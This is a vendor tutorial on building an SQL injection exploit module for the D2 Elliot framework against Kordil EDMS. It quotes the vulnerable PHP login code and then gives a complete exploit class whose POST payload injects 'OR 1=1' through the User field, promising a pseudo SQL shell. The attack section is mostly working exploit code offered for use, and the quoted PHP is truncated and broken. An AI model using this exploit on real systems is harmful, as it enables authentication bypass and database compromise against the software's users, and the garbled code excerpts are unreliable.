Quick SQLi exploit development with D2 Elliot

D2 Elliot already provides several hundreds of ready to use web exploits but sometimes you need to develop your own exploits. Elliot makes available specific Python classes to do that. An example is the best way to understand how it can be easy to develop an exploit with Elliot. So let's take the following SQL Injection vulnerability in Kordil EDMS: http://www.exploit-db.com/exploits/23180/.

The vulnerability is in global_group_login.php, no input validation is performed on User and Password parameters.

if (isset($_POST["act"])) {
    $userlevel = 0;
    $sql = "";
    $sql .= "  SELECT `user_name` , `password` , `security_level` , `business_email_address` FROM `users`\n";
    $sql .= " WHERE ";
    $sql .= " `user_name` = '".qsrequest("User"). "'" ;
    $sql .= " AND `password` = '" .qsrequest("Password"). "'";
    if(!$result = @mysql_query($sql)){
        $err_string .= "<strong>Error:</strong> while connecting to database<br>" . mysql_error();
        $num_rows = mysql_num_rows($result);
        $row = mysql_fetch_array($result);
} else{
    if ((qssession("UserLogon") != "") && (qssession("Logon") == "FALSE")) {
        $err_string = "Permission failed";

The qsrequest function in qs_functions.php doesn't filter parameters.

function qsrequest ($paramval)
    if (isset($_GET[$paramval])) {
        $retval = $_GET[$paramval];
    }elseif (isset($_POST[$paramval])) {
        $retval = $_POST[$paramval];
      $retval = "";
    return $retval;

Now you can develop the exploit for this identified vulnerability. xSQLi is the Python class that must be used for SQL Injection exploit. You have to choose an UID and describe the header with the payload (Payload.SQL) and the family (Family.SQLi) specific to SQL injection. The vulnerability will be exploited through User parameter in a POST request sent to global_group_login.php defined as the vuln_page_default in the exploit.

<SQL> tag will locate the vulnerability. It is placed just after the SQL statement which must be evaluated as True and before the SQL comment characters. Save the exploit in kordiledms_sqli.py file and move it to ELLIOT_ROOT/modules/exploits/ directory.

# modules.exploits.kordiledms_sqli
# Copyright DSquare Security, LLC, 2013

from core.templates.exploits import *

# Main class inherits the xSQLi class dedicated to SQL Injection exploit
class MyExploit(xSQLi):
    # Unique exploit id
    uid = 'E-280'

    # Mandatory exploit header
    _extra_description = {
        'name': 'Kordil EDMS v2.2.60rc3 SQL Injection',
        'creation': '2012/12/07 04:20:39 AM',
        'lastupdate': '2012/12/21 06:52:54 AM',
        'description': 'SQL Injection vulnerability in Kordil EDMS',
        'comment': '',
        'author': ('',),
        'vendor': 'Kordil EDMS',
        'zeroday': False,
        'published': '2012/12/06',
        'references': ('http://www.exploit-db.com/exploits/23180/',),
        'cve': (),
        'vulnid': (),
        'platform': Platform.All,
        'application': 'Kordil EDMS',
        'version': ('<= 2.2.60rc3',),
        'module': '',
        'requirements': {},
        'payload': Payload.SQL,
        'family': Family.SQLi,
        'googledork': '',
        'stealth': Stealth.Stealth,
    # Vulnerable page
    vuln_page_default = 'global_group_login.php'
    # Main method returning the POST data to send to vuln_page
    # <SQL> tag locates the vulnerability 
    def exploit(self):            
        return {
                'User':'1\' OR 1=1 <SQL> -- -',

Elliot will find the most efficient SQL Injection method and parameters to exploit this vulnerability. In the following video you can see how this exploit gives you a pseudo SQL shell.

Back to News

Share :   Facebook   Twitter   Google+